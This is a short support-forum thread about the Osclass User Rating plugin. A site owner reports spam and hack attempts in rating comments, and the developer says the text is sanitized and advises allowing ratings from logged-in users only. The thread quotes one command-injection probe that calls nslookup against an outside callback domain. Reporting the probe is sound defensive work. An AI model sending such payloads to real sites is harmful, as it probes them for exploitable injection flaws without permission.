Osclass Support Forums

Osclass plugin support => User Rating Plugin => Topic started by: Ajit Sahane on May 24, 2023, 11:19:32 AM

Title: Rating comment spam hack attempt
Post by: Ajit Sahane on May 24, 2023, 11:19:32 AM

I found lot of comment filed spam + hack code submitted by hackers. If we user rating auto approve set then anybody submit 1-5* fake rating with comment value - &nslookup -q=cname hitmtjqtyxgegbc74e.bxss.me&  like this.

So, this plugin comment text need to filter those html - sql query code. need sanitization text submission.

check screenshot

Title: Re: Rating comment spam hack attempt
Post by: MB Themes on May 24, 2023, 11:46:00 AM

Enable rating for logged in users only.
Text is sanitized and do not think it represent any issue. If you print this on website I expect it's printed as text and not as HTML code.

Title: Re: Rating comment spam hack attempt
Post by: Ajit Sahane on May 25, 2023, 06:25:15 AM

Yes. Now validation is ON. and website print content is text format, not html.

So, not big issue.

Just aware about this type hack attempt for future security.

It's clear shown, bad actors trying to something doing unusual activities.